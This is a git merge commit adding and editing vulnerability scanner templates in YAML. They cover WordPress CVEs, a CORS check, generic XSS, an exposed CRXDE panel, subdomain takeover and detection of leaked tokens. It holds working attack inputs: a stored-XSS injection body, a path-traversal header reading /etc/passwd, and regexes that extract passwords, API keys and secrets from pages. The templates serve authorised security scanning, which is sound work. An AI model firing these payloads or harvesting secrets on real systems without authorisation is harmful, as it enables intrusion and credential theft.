Merge pull request #86 from Nadino92/master

improvements across multiple templates and new additions
2020-05-24 09:16:54 +05:30 · 2020-05-24 09:16:54 +05:30 · 0a564274ac
parent 4e96598a01 c0bf01de1a
commit 0a564274ac
14 changed files with 145 additions and 39 deletions
--- a/cves/CVE-2018-18069.yaml
+++ b/cves/CVE-2018-18069.yaml
@ -0,0 +1,17 @@
+id: CVE-2018-18069
+
+info:
+  name: Wordpress unauthenticated stored xss
+  author: nadino
+  severity: medium
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php"
+    body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
+
+    matchers:
+      - type: dsl
+        dsl:
+        - 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
--- a/cves/CVE-2018-6389.yaml
+++ b/cves/CVE-2018-6389.yaml
@ -0,0 +1,16 @@
+id: CVE-2018-6389
+
+info:
+  name: Wordpress Load Script
+  author: nadino
+  severity: high
+
+requests:
+  - method: GET
+    path: 
+      - "{{BaseURL}}/wp-admin/load-scripts.php?load="
+    matchers:
+      - type: dsl
+        dsl:
+        - 'contains(x_powered_by,"Engine")'
+        - 'contains(content_type,"javascript")'
--- a/cves/CVE-2019-5418.yaml
+++ b/cves/CVE-2019-5418.yaml
@ -11,7 +11,7 @@ requests:
    path:
      - "{{BaseURL}}"
    headers:
-      Accept: ../../../../../../../../etc/passwd{{
+      Accept: ../../../../../../../../etc/passwd
    matchers:
      - type: status
        status:
--- a/hosts.txt
+++ b/hosts.txt
@ -0,0 +1 @@
+http://192.168.1.16
--- a/noisy/general-tokens.yaml
+++ b/noisy/general-tokens.yaml
@ -0,0 +1,32 @@
+id: general-tokens
+
+#this will create a huge load of false positive
+
+info:
+  name: General Tokens
+  author: nadino
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: dsl
+        dsl:
+        - 'regex("TOKEN[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'                  #any TOKEN word
+        - 'regex("API[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'                    #any API word
+        - 'regex("KEY[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'                    #any KEY word
+        - 'regex("SECRET[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'                 #any SECRET word
+        - 'regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'          #any AUTHORIZATION word
+        - 'regex("PASSWORD[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'               #any PASSWORD word
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(T|t)(O|o)(K|k)(E|e)(N|n)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)+( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(A|a)(P|p)(Ii)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(K|k)(E|e)(Y|y)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(S|s)(E|e)(C|c)(R|r)(E|e)(T|t)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(A|a)(U|u)(T|t)(H|h)(O|o)(R|r)(I|i)(Z|z)(A|a)(T|t)(I|i)(O|o)(N|n)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(P|p)(A|a)(S|s)(S|s)(W|w)(O|o)(R|r)(D|d)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
--- a/noisy/general-xss.yaml
+++ b/noisy/general-xss.yaml
@ -0,0 +1,19 @@
+id: General XSS
+
+info:
+  name: General XSS
+  author: nadino
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: word
+        words:
+          - 'a''"><injectable>'
+        part: body
+      - type: dsl
+        dsl:
+        - 'contains(content_type,"html")'
--- a/panels/crxde.yaml
+++ b/panels/crxde.yaml
@ -0,0 +1,15 @@
+id: crxde
+
+info:
+  name: CRXDE Lite
+  author: nadino
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/crx/de/index.jsp"
+    matchers:
+      - type: word
+        words:
+          - "<title>CRXDE Lite</title>"
--- a/security-misconfiguration/basic-cors.yaml
+++ b/security-misconfiguration/basic-cors.yaml
@ -8,7 +8,7 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
    headers:
      Origin: https://evil.com
    matchers:
--- a/subdomain-takeover/detect-all-takeovers.yaml
+++ b/subdomain-takeover/detect-all-takeovers.yaml
@ -68,6 +68,12 @@ requests:
        - ngrok.io not found
        - Tunnel *.ngrok.io not found

+      - type: word
+        name: tumblr
+        words:
+        - Whatever you were looking for doesn't currently exist at this address.
+        - There's nothing here.
+
      - type: word
        name: github
        words:
--- a/tokens/amazon-mws-auth-token-value.yaml
+++ b/tokens/amazon-mws-auth-token-value.yaml
@ -19,4 +19,4 @@ requests:
        type: regex
    method: GET
    path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
--- a/tokens/aws-access-key-value.yaml
+++ b/tokens/aws-access-key-value.yaml
@ -8,7 +8,7 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
    matchers:
      - type: regex
        part: body
--- a/tokens/google-api-key.yaml
+++ b/tokens/google-api-key.yaml
@ -8,7 +8,7 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
    matchers:
      - type: regex
        part: body
--- a/tokens/mailchimp-api-key.yaml
+++ b/tokens/mailchimp-api-key.yaml
@ -8,7 +8,7 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
    matchers:
      - type: regex
        part: body
--- a/tokens/slack-access-token.yaml
+++ b/tokens/slack-access-token.yaml
@ -11,7 +11,7 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
    matchers:
      - type: regex
        part: body